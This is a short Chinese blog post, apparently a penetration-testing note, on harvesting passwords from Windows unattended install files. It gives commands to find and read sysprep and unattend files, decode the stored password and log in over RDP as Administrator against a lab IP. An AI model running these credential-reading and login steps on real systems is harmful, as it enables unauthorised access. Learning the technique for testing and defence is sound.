无人值守的文件安装
最编程
2024-10-05 09:37:48
...
一般配合BypassUAC
原理
一些 windows 无人值守安装文件中含有用户的明文或 base64 编码后的密文。
无人值守安装文件中的密码不一定是管理员密码,它也可能是普通用户的密码或者服务账户的密码。
不过,在无人值守文件(如 sysprep.xml 或 unattend.xml)中,有时会包含管理员账户的密码设置,尤其是在自动化部署场景下。
命令
cd C:\
dir /s *sysprep.inf *sysprep.xml *unattend.xml *unattend.txt 2>nul常见位置:
-
C:\sysprep.inf
-
C:\sysprep\sysprep.xml
-
C:\Windows\system32\sysprep.inf
-
C:\Windows\system32\sysprep\sysprep.xml
-
C:\Windows\Panther\Unattend\Unattended.xml
-
C:\Windows\Panther\Unattend\Unattend.xml
-
C:\Windos\System32\sysprep\unattend.xml
-
C:\Windows\System32\Sysprep\Panther\unattend.xml
案例
到C盘根目录下搜索
cd C:\
dir /s *sysprep.inf *sysprep.xml *unattend.xml *unattend.txt 2>nul
查看权限
icacls "C:\Windows\System32\Sysprep\Panther\unattend.xml"
普通用户可读
尝试读取
type C:\Windows\System32\Sysprep\Panther\unattend.xml
解码
尝试登录
xfreerdp /u:Administrator /p:20010505 /v:192.168.74.130 /cert:ignore
上一篇: SDKMAN!安装 Maven
推荐阅读
-
无人值守的文件安装
-
在 ubuntu 中安装库文件和头文件的位置
-
从手动到无人值守的智能加油站 开放源代码
-
在Linux系统下安装和使用软件解压RAR文件的方法
-
Linux中如何恢复rm命令误删除的文件之extundelete编译安装及使用
-
在Ubuntu上安装Kubernetes (k8s) v1.24.1的二进制文件,支持IPv4和IPv6双栈
-
超级详细的MATLAB R2021b安装指南(附带完整安装文件)
-
如何在Ubuntu中安装tar.gz、tar.bz和deb文件(以LibreOffice的安装为例)
-
无人值守操作技巧系列文章(2):MSFVenom 中隐藏的参数解析
-
无人值守操作技巧系列文章(2):MSFVenom 中隐藏的参数解析